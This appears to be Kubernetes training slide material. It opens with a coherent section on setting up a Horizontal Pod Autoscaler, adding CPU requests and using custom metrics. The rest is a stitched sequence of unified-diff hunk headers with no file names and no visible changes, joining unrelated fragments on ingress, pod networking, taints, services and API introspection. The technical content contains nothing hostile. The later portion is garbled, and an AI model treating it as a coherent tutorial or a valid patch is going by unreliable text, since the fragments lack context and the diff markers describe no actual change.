- There is a helper command to do that for us: `kubectl autoscale`

.exercise[

- Create the HPA policy for the `busyhttp` deployment:
  ```bash
  kubectl autoscale deployment busyhttp --max=10
  ```

]

By default, it will assume a target of 80% CPU usage.

This can also be set with `--cpu-percent=`.

--

*The autoscaler doesn't seem to work. Why?*
---

## What did we miss?

- The events stream (`kubectl get events -w`) gives us a hint, but to be honest, it's not very clear:

  `missing request for cpu`

- We forgot to specify a resource request for our Deployment!

- The HPA target is not an absolute CPU%

- It is relative to the CPU requested by the pod
---

## Adding a CPU request

- Let's edit the deployment and add a CPU request

- Since our server can use up to 1 core, let's request 1 core

.exercise[

- Edit the Deployment definition:
  ```bash
  kubectl edit deployment busyhttp
  ```

- In the `containers` list, add the following block:
  ```
  resources: {"requests":{"cpu":"1", "memory":"64Mi"}}
  ```

]
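For reference, once the edit is saved, the relevant part of the Deployment should look roughly like this (the rest of the spec is elided):

```yaml
spec:
  template:
    spec:
      containers:
        - name: busyhttp
          image: jpetazzo/busyhttp
          resources:
            requests:
              cpu: "1"
              memory: 64Mi
```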
---

## Results

- After saving and quitting, a rolling update happens

  (if `hey` exits, make sure to restart it)

- It will take a minute or two for the HPA to kick in:

  - the HPA runs every 30 seconds by default

  - it needs to gather metrics from the metrics server first

- If we scale further up (or down), the HPA will react after a few minutes:

  - it won't scale up if it already scaled in the last 3 minutes

  - it won't scale down if it already scaled in the last 5 minutes
---

## What about other metrics?

- The HPA in API group `autoscaling/v1` only supports CPU scaling

- The HPA in API group `autoscaling/v2beta2` supports metrics from various API groups:

  - metrics.k8s.io, aka metrics server (per-Pod CPU and RAM)

  - custom.metrics.k8s.io, custom metrics per Pod

  - external.metrics.k8s.io, external metrics (not associated with Pods)

- Kubernetes doesn't implement any of these API groups

- Using these metrics requires [registering additional APIs](https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-metrics-apis)

- The metrics provided by metrics server are standard; everything else is custom

- For more details, see [this great blog post](https://medium.com/uptime-99/kubernetes-hpa-autoscaling-with-custom-and-external-metrics-da7f41ff7846) or [this talk](https://www.youtube.com/watch?v=gSiGFH4ZnS8)
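For illustration, an `autoscaling/v2beta2` policy scaling on a custom per-Pod metric might look like this (the metric name is hypothetical and would have to be provided by a custom metrics adapter):

```yaml
apiVersion: autoscaling/v2beta2
kind: HorizontalPodAutoscaler
metadata:
  name: web
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: web
  minReplicas: 2
  maxReplicas: 10
  metrics:
    - type: Pods
      pods:
        metric:
          name: http_requests_per_second   # hypothetical custom metric
        target:
          type: AverageValue
          averageValue: "100"
```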
@@ -88,7 +88,7 @@

  - the control loop watches over ingress resources, and configures the LB accordingly

- Step 2: set up DNS

  - associate DNS entries with the load balancer address

@@ -126,7 +126,7 @@

- We could use pods specifying `hostPort: 80`

  ... but with most CNI plugins, this [doesn't work or requires additional setup](https://github.com/kubernetes/kubernetes/issues/23920)

- We could use a `NodePort` service
@@ -142,7 +142,7 @@

  (sometimes called sandbox or network sandbox)

- An IP address is assigned to the pod

- This IP address is routed/connected to the cluster network

@@ -239,7 +239,7 @@ class: extra-details

  - an error condition on the node
    <br/>
    (for instance: "disk full," do not start new pods here!)

- The `effect` can be:
@@ -501,11 +501,11 @@ spec:

  (as long as it has access to the cluster subnet)

- This allows the use of external (hardware, physical machines...) load balancers

- Annotations can encode special features

  (rate-limiting, A/B testing, session stickiness, etc.)

---
@@ -81,7 +81,7 @@ Under the hood: `kube-proxy` is using a userland proxy and a bunch of `iptables`

.exercise[

- In another window, watch the pods (to see when they are created):
  ```bash
  kubectl get pods -w
  ```

@@ -276,21 +276,3 @@ error: the server doesn't have a resource type "endpoint"

- There is no `endpoint` object: `type Endpoints struct`

- The type doesn't represent a single endpoint, but a list of endpoints

---
## Exposing services to the outside world

- The default type (ClusterIP) only works for internal traffic

- If we want to accept external traffic, we can use one of these:

  - NodePort (expose a service on a TCP port in the 30000-32767 range)

  - LoadBalancer (provision a cloud load balancer for our service)

  - ExternalIP (use one node's external IP address)

  - Ingress (a special mechanism for HTTP services)

*We'll see NodePorts and Ingresses more in detail later.*
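As a quick illustration, a minimal `NodePort` service could look like this (the names and port numbers are arbitrary):

```yaml
apiVersion: v1
kind: Service
metadata:
  name: webui                # hypothetical service name
spec:
  type: NodePort
  selector:
    app: webui
  ports:
    - port: 80               # the service's ClusterIP port
      targetPort: 80         # the container port
      nodePort: 30080        # must fall in the NodePort range (30000-32767 by default)
```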
@@ -108,7 +108,7 @@ class: extra-details

## Introspection vs. documentation

- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/#api-reference)

- The API documentation is usually easier to read, but:

@@ -132,7 +132,7 @@ class: extra-details

  - short (e.g. `no`, `svc`, `deploy`)

- Some resources do not have a short name

- `Endpoints` only have a plural form
@@ -466,4 +466,4 @@ class: extra-details

- For more details, see [KEP-0009] or the [node controller documentation]

[KEP-0009]: https://github.com/kubernetes/enhancements/blob/master/keps/sig-node/0009-node-heartbeat.md
[node controller documentation]: https://kubernetes.io/docs/concepts/architecture/nodes/#node-controller